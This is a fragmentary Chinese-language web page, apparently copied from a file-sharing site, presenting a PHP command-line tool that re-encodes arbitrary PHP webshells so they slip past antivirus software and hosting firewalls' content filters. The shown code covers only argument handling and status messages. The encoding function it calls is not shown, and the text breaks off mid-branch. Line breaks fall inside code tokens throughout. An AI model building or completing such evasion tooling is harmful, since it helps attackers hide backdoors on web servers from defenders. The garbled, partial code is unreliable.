background image

 

PHP 源码:php shell 超强免杀、减少体积工具实现代

这不是 webshell,只是个 webshell 免杀工具,切勿当初 webshell 使用,仅限免杀 phpwebshell
lostwolf

 

写的

这不是 webshell,只是个 webshell

 

免杀工具

切勿当初 webshell

 

使用

仅限免杀 phpwebshell 

 

该工具运行在 cli 

 

模式!

 

 

 

如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意 php webshell 通过此工具编码之后可以饶过国内一些 bt

 

的防火墙

代码如下:
 
<?php 

/* 
Title: PHP shell nokill T00L 
Blog: exploit-db.blogcn.com 
*/

 

error_reporting

(0); 

@

ini_set

('memory_limit','-1'); 

set_time_limit(0); 

$toolname

="$argv[0]"; 

if

 (

$argc

<2) { 

baner(

$toolname

); 

die

$input_file

= trim(

$argv

[1]); 

$output_file

='nokill_'.

$input_file

if

 (

file_exists

(

$input_file

)) { 

No_kill_c0de(

$input_file

,

$output_file

); 

echo

 "PHP shell nokill T00L\r\n"; 

echo

 "Blog: exploit-db.blogcn.com\r\n"; 

echo

 "Input: {$input_file}\r\n"; 

$file_full_path

=dirname(

__FILE__

).DIRECTORY_SEPARATOR.

$output_file

echo

 "[+] Generate success!\r\n"; 

echo

 "Saved to {$file_full_path}"."\r\n"; 

else

 { 

echo

 "PHP shell nokill T00L\r\n"; 

echo

 "Blog: exploit-db.blogcn.com\r\n";